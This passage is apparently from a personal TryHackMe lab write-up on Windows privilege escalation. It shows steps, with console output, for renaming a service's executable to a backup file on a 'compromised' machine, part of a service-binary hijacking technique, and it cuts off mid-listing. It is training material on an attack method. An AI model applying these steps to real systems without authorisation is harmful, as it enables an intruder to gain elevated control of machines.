JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/(Unfinished) Windows Privilege Escalation.md

                3 Dir(s)  14,788,710,400 bytes free
 ```

+9. `move <PAYLOAD> <FILENAME>` from the compromised Windows machine to rename our target service's `BINARY_PATH_NAME` into a backup file
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>move WService.exe WService.exe.bkp
         1 file(s) moved.
 ```

+9. `dir` from the compromised Windows machine to display the files and directories that are in our current working directory to ensure that the executable was renamed
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>dir
  Volume in drive C has no label.